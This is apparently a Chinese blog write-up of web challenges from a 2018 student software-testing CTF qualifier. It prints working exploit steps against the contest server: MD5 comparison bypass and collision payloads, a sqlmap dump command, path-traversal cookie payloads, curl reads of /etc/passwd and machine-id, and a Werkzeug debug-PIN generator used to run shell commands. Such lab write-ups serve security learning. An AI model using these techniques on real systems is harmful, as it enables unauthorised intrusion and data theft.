南溟丷

在这浩瀚星河的你是什么

0%

2018 全国大学生软件测试大赛 安恒杯Web测试大赛 预选赛 部分题解

全国大学生软件测试大赛预选赛。

原题复现大赛。

0x00 输入试试

1
自己看看就做出来了 http://114.55.36.69:8003

右键源代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title>Input</title>
</head>
<body>
<div align="center">
<input type="text" id="flag" style="width: 200px;margin-left: 100px;" value="" />
<input type="button" name="" id="" onclick="check();" value="提交"/>
</div>
</body>
<script>
function check(){
var flag = document.getElementById("flag").value;
var str = "d84d9657e5e5e" || 0;
var str = str + ("ad2ad3fe" && 2);
var str = str + "a2da9494b8" + "ddea4fd4";
var str = str.split("").reverse().join("");
if (str == flag){
alert("恭喜你已经找到flag!");
}
}
</script>
</html>

修改一下JavaScript代码然后随便输入一个数值即可。

1
2
3
if (str != flag){
alert(str);
}

得到flag{4df4aedd8b4949ad2a2e5e5e7569d48d}

0x01 game

1
玩个蛇皮 http://114.55.36.69:8011

照常是右键源代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<!DOCTYPE html> 
<html>
<head>

<title>Game</title>
<link rel="stylesheet" type="text/css" href="./css/game.css" />
</head>
<body>
<div id="game-area" tabindex="0">
</div>
<script type="text/javascript" src="./js/game.js"></script>
<script type="text/javascript">
var mySnakeBoard = new SNAKE.Board( {
boardContainer: "game-area",
fullScreen: true
});
</script>
</body>
</html>

没给什么明显信息,一开始以为是藏在robots.txt中,但是没有,最后在JavaScript中找到如下的aaencode加密。

1
2
3
if (me.snakeLength > 2500){
゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ (o^_^o)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');
}

解码得到。

1
2
3
4
if (me.snakeLength > 2500){
window['flag'] = 'Flag{660332922504a5f06dd871a7fe78ba9c}';
console.log("Flag{ hahahah wrong!! :(}");
}

0x02 简单的md5

1
简单的md5 http://114.55.36.69:8004

照常是右键源代码。

1
easy MD5 cracking <!--$_POST['data1']!=$_POST['data2']-->fail

很简单的MD5加密验证绕过。原理就是利用PHP==对比会将0e开头的字符串判定为0,故全等,payload如下。

1
data1=QNKCDZO&data2=s878926199a

得到flag{401cf19d304e557349fecda18110c138}

0x03 传个flag试试

1
传个flag试试 http://114.55.36.69:8012
1
2
3
参数提交

flag作为参数以POST方式提交试试?

那就以POST提交flag=1111111111,得到flag{858a14671c27804b63e6e96b0acdfdd7}

0x04 md5

1
md5 crash http://114.55.36.69:8006

右键源代码。

1
MD5 cracking<!-- if((string)$_POST['data1']!==(string)$_POST['data2']&&md5($_POST['data1'])===md5($_POST['data2']))-->fail

构造绕过。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST / HTTP/1.1
Host: 114.55.36.69:8006
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://114.55.36.69:8006/
Content-Type: application/x-www-form-urlencoded
Content-Length: 397
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache

data1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&data2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

得到返回包。

1
2
3
4
5
6
7
8
9
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 06:38:13 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 156
Connection: close
Content-Type: text/html; charset=UTF-8

MD5 cracking<!-- if((string)$_POST['data1']!==(string)$_POST['data2']&&md5($_POST['data1'])===md5($_POST['data2']))-->flag{9bd1ee7355b58e53214adb9a37b4cb82}

0x05 新闻搜索

1
简单的新闻搜索网站 http://114.55.36.69:8010

简单的POST注入。

1
python sqlmap.py -r "sql.txt" -p word -D news -T admin -C "flag,username" --dump

得到flag{f98505d1d12f50a0bd9463e90876630}

0x06 新写的小站

安恒六月月赛的一道题,Mynote

1
http://114.55.36.69:8014

打开robots.txt

1
2
3
4
5
User-agent: *
Allow: /controllers/Basecontrol.php
Allow: /controllers/Controllers.php
Allow: /controllers/User.php
Allow: /flag.php

点开flag看到flag{This_1S_A_F4ke_f1aG},。。。假的,抓包。

1
2
3
4
5
6
7
8
9
10
11
12
13
GET /index.php/picture HTTP/1.1
Host: 114.55.36.69:8014
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://114.55.36.69:8014/index.php/index
Connection: close
Cookie: Picture=YToxMDp7aTowO3M6ODoiMTIzNC5waHAiO2k6MTtzOjE0OiJzb3V0aC5waHA7LmpwZyI7aToyO3M6MTY6IlFRMjAxODEwMjQtMS5qcGciO2k6MztzOjk6InNoZWxsLnBocCI7aTo0O3M6NjoiMTEucGhwIjtpOjU7czo1OiJhLmpwZyI7aTo2O3M6NjoiMTIucGhwIjtpOjc7czo3OiIxMjMucGhwIjtpOjg7czo5OiJzb3V0aC5waHAiO2k6OTtzOjU6IjEucGhwIjt9; PHPSESSID=u8hkg39ac7ao31onanenii8ifd
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache

留意到Cookie中的Picture有些古怪,像是base64编码。

1
YToxMDp7aTowO3M6ODoiMTIzNC5waHAiO2k6MTtzOjE0OiJzb3V0aC5waHA7LmpwZyI7aToyO3M6MTY6IlFRMjAxODEwMjQtMS5qcGciO2k6MztzOjk6InNoZWxsLnBocCI7aTo0O3M6NjoiMTEucGhwIjtpOjU7czo1OiJhLmpwZyI7aTo2O3M6NjoiMTIucGhwIjtpOjc7czo3OiIxMjMucGhwIjtpOjg7czo5OiJzb3V0aC5waHAiO2k6OTtzOjU6IjEucGhwIjt9

一个Cookie任意文件读取。

1
a:10:{i:0;s:8:"1234.php";i:1;s:14:"south.php;.jpg";i:2;s:16:"QQ20181024-1.jpg";i:3;s:9:"shell.php";i:4;s:6:"11.php";i:5;s:5:"a.jpg";i:6;s:6:"12.php";i:7;s:7:"123.php";i:8;s:9:"south.php";i:9;s:5:"1.php";}

构造payload

1
a:1:{i:0;s:14:"../../flag.php";}

base64编码。

1
YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=

传入参数。

1
2
3
4
5
6
7
8
9
10
11
12
13
GET /index.php/picture HTTP/1.1
Host: 114.55.36.69:8014
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://114.55.36.69:8014/index.php/index
Connection: close
Cookie: Picture=YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30%3D;PHPSESSID=u8hkg39ac7ao31onanenii8ifd
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache

将读取到的文件以base64编码的形式返回。

1
<img src="data:image/jpg;base64,PD9waHAKCiRmbGFnID0gImZsYWd7TjRtZV9zUGFjNF9Jc19JbnQzcjNzdDFuZ30iOwplY2hvICJmbGFne1RoaXNfMVNfQV9GNGtlX2YxYUd9IjsK" >

解码。

1
2
3
4
<?php

$flag = "flag{N4me_sPac4_Is_Int3r3st1ng}";
echo "flag{This_1S_A_F4ke_f1aG}";

0x07 测试

1
http://114.55.36.69:8014

扫后台得到一个路径http://114.55.36.69:8013/console

且登陆后在个人信息页面有一个任意文件读取【后来学长告诉我的,记笔记。

1
<img src="/image/cGljLmpwZw%3D%3D " alt="">

使用curl读就行。

然后百度了一下,先知有一篇文章,是Debug Pin问题

我们需要以下几个值以求PIN的值。

1
2
3
4
5
6
7
8
9
10
11
username就是启动这个Flask的用户

modname为flask.app

getattr(app, '__name__', getattr(app.__class__, '__name__'))为Flask

getattr(mod, '__file__', None)为flask目录下的一个app.py的绝对路径

uuid.getnode()就是当前电脑的MAC地址,str(uuid.getnode())则是mac地址的十进制表达式

get_machine_id()不妨跟进去看一下

于是读取任意文件求值。

1
2
/../../../usr/local/lib/python2.7/dist-packages/flask/app.py
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL3Vzci9sb2NhbC9saWIvcHl0aG9uMi43L2Rpc3QtcGFja2FnZXMvZmxhc2svYXBwLnB5 >app.py
1
2
3
/../../../etc/machine-id
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9tYWNoaW5lLWlk
3e608929fbd39b959f388bf468c9f0b1
1
2
3
/../../../sys/class/net/eth0/address
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL3N5cy9jbGFzcy9uZXQvZXRoMC9hZGRyZXNz
02:42:c0:a8:2a:21

mac地址转换成16进制2485723343393

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/../../../etc/passwd
Antarctica:~ south$ http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q=
-bash: http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q=: No such file or directory
Antarctica:~ south$ curl http://114.55.36.69:8013/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q=
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:999:999::/home/mysql:
ctf:x:1000:1000::/home/ctf:/bin/bash

最后附上抄来的脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import hashlib
from itertools import chain
probably_public_bits = [
'ctf',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]

private_bits = [
'2485723343393',# str(uuid.getnode()), /sys/class/net/eth0/address
'3e608929fbd39b959f388bf468c9f0b1'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)
1
PIN: 228-209-547

得到PIN码后就可以使用Python指令进行操作了。

1
2
3
4
5
>>> os.popen('ls /').readlines()
['app\n', 'bin\n', 'boot\n', 'dev\n', 'docker-entrypoint-initdb.d\n', 'entrypoint.sh\n', 'etc\n', 'fff111aaggggg___hhh\n', ]
>>> os.popen('cat /fff111aaggggg___hhh').readlines()
['flag{d93743011d3158db70150a4301018b2c}\n']

0x08 艰难的分析

啥玩意,照着安恒网易云课堂的wp做不出。